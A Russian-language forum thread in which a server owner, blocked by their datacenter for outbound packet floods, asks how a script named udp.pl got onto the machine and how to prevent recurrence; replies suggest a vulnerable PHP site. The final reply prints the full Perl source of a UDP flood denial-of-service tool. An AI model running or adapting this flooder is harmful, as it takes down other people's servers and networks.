udp.pl как обнаружить и ликвидировать?

0

1

Сервер заблокировали в датацентре за отсылку огромного количества пакетов.
Зашел через kvm, увидел в процессах udp.pl, который собственно и генерировал этот трафик.
Убил процесс, нашел в /tmp/ этот скрипт, удалил, удалил wget, поменял все пароли.

Как мог произойти взлом(я так понимаю права root взломщик не получил) и что сделать, чтобы такое не повторялось?

Ссылка

←	Поломали что-ли?

Исходящий PortScan

→

надо было выложить на пастебин какой-нибудь перед удалением -_-

anonymous
(07.04.11 12:26:03 MSK)

Ссылка

Вы бы хоть посмотрели, кому файл принадлежал.

AITap ★★★★★
(08.04.11 15:43:56 MSK)

Ссылка

> Убил процесс, нашел в /tmp/ этот скрипт, удалил, удалил wget, поменял все пароли.

Удалять скрипт не надо было, надо было хотя бы перенести куда-нибудь, чтобы потом посмотреть. А вообще обычно кладут в /tmp и /var/tmp скрипты через php-ятину дырявую. Смотри новые файлы в DocumentRoot.

Deleted
(09.04.11 00:54:45 MSK)

Ссылка

Содержимое upd.pl показал бы хоть.

blackst0ne ★★★★★
(11.04.11 03:33:01 MSK)

Ссылка

#!/usr/bin/perl

#####################################################

# udp flood.

#

# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.

#

# --/odix

######################################################



use Socket;



$ARGC=@ARGV;



if ($ARGC !=3) {

printf "$0 <ip> <port> <time>n";

printf "if arg1/2 =0, randports/continous packets.n";

exit(1);

}



my ($ip,$port,$size,$time);

$ip=$ARGV[0];

$port=$ARGV[1];

$time=$ARGV[2];



socket(crazy, PF_INET, SOCK_DGRAM, 17);

   $iaddr = inet_aton("$ip");



printf "udp flood - odixn";



if ($ARGV[1] ==0 && $ARGV[2] ==0) {

goto randpackets;

}

if ($ARGV[1] !=0 && $ARGV[2] !=0) {

system("(sleep $time;killall -9 udp) &");

goto packets;

}

if ($ARGV[1] !=0 && $ARGV[2] ==0) {

goto packets;

}

if ($ARGV[1] ==0 && $ARGV[2] !=0) {

system("(sleep $time;killall -9 udp) &");

goto randpackets;

}



packets:

for (;;) {

$size=$rand x $rand x $rand;

send(crazy, 0, $size, sockaddr_in($port, $iaddr));

}



randpackets:

for (;;) {

$size=$rand x $rand x $rand;

$port=int(rand 65000) +1;

send(crazy, 0, $size, sockaddr_in($port, $iaddr));

}

anonymous
(13.04.11 17:39:01 MSK)